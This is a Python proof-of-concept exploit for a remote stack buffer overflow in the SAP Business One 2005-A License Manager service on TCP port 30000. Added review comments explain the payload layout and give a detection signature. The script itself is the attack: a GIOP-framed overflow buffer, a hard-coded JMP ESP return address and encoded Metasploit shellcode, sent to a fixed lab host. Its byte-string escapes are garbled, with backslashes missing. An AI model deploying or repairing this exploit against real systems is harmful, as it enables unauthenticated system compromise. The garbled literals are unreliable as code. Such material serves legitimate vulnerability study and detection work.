# Title : SAP Business One 2005-A License Manager Remote BOF Exploit
# Published : 2009-08-01
# Author : Bruk0ut
#!/usr/bin/python
# Proof-of-concept for the stack-based buffer overflow in NT_Naming_Service.exe
# (SAP Business One 2005-A License Manager) described in the INFO box below.
# The file is one flat run with no functions: build a single request, open a
# TCP connection to a hard-coded host on port 30000, send the request once,
# sleep, close. It is Python 2 code: a plain str is handed to socket.send
# without encoding, which Python 3 refuses.
#
# NOTE(review): every backslash in the byte-string literals below was lost in
# extraction ("xbf" where the source had "\xbf", "rn" where it had "\r\n").
# As printed, the script would send the ASCII text of the escape sequences,
# not the intended bytes; read the literals as documentation of the payload
# layout rather than as a runnable artifact.
import socket, time
#########################################INFO################################################
# NT_Naming_Service.exe (License Manager 2005 for SAP Business One 2005-A) is #
# vulnerable to a stack-based buffer overflow allowing for full system compromise by #
# an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.#
# Mike Arnold ---> mikey27 .::at::. hotmail.com #
############################################################################################
# Banner printed to stdout before anything is sent. The trailing "rn" on each
# line was "\r\n" before extraction garbled it.
header = ("########################################################################rn"
"# SAP Business One 2005-A License Manager remote overflow PoC #rn"
"# Tested on 2005-A (6.80.123) SP:00 PL:06 #rn"
"# 2005-A (6.80.320) SP:01 PL:34 #rn"
"# OS: Windows Server 2003 R2 Std/Ent Service Pack 2 #rn"
"# Coded by Bruk0ut - mikey27 .::at::. hotmail.com #rn"
"########################################################################rn")
#metasploit windows/exec - notepad.exe x86/shikata_ga_nai 152 bytes
# Encoded x86 payload blob; the ten lines below hold 152 two-digit hex pairs,
# matching the byte count in the comment above. Its only observable effect on
# the test host is launching notepad.exe, i.e. a harmless marker of control.
sc = ("xbfxd6x21x7dx3bxdaxdbxd9x74x24xf4x33xc9x5dxb1"
"x20x31x7dx13x83xc5x04x03x7dxd9xc3x88xc7x0dx47"
"x73x38xcdxc3x36x04x46xafxbdx0cx59xbfx35xa3x41"
"xb4x15x1cx70x21xe0xd7x46x3exf2x09x97x80x6cx79"
"x53xc0xfbx85x9ax0bx0ex8bxdex67xe5xb0x8ax53x02"
"xb2xd7x17x55x18x16xc3x0cxebx14x58x5axb4x38x5f"
"xb7xc0x5cxd4x46x3cxd5xb6x6cxc6x26x19x5cx30xc8"
"xf0xfax37x4excdx89x08x42xa6xfex94xf7x33x96xac"
"x8exbcxe4x6dxfax6cx83x9dx70x88x0cx36x1cx6fx38"
"xc8x4bx6fxdaxbbx1cxfbx40x34x83x67xa5xd1x3bx0d"
"xb9x13")
#JMP ESP 0x773a73fb User32.dll - Server2k3 R2 STD/ENT - SP2
# Saved-return-address overwrite, little-endian (fb 73 3a 77 == 0x773a73fb).
# It is valid only for the exact User32.dll build named above, which is why
# the banner lists specific product builds and OS service pack: on any other
# image the jump lands elsewhere and the process most likely just crashes.
ret = 'xfbx73x3ax77'
# 0x47 0x49 0x4f 0x50 is ASCII "GIOP" (CORBA/IIOP magic); the remaining four
# bytes presumably encode the GIOP version, byte-order flag and message type
# — confirm against the GIOP header layout in the CORBA spec.
giop_header = 'x47x49x4fx50x01x00x01x00'
# Intended request layout (byte counts assume the escapes are restored):
#   8   GIOP header
#   1000  "/\" repeated 500 times (0x2f 0x5c) — the overflow filler
#   24  'A' padding up to the saved return address
#   4   ret (JMP ESP)
#   44  0x90 NOP sled, then the 152-byte payload, then 384 more NOPs
# For detection: a request to TCP/30000 that starts with "GIOP" and carries a
# long run of "/\" pairs is the distinguishing shape of this PoC.
buff = giop_header + 'x2fx5c' * 500 + "A" * 24 + ret + 'x90' * 44 + sc + 'x90' * 384
print (header)
# Target host is hard-coded (a private-range lab address); there is no
# argument parsing, so the script must be edited to point elsewhere.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (('10.0.0.241',30000))
# NOTE(review): the socket is switched to non-blocking before the send, and
# the return value of send (bytes actually written) is discarded — a partial
# write of the ~1.6 KB request would go unnoticed.
s.setblocking(0)
s.send(buff)
time.sleep(1)
# "done!" is printed unconditionally; nothing checks whether the service
# answered, crashed, or ran the payload.
print ("done!")
s.close()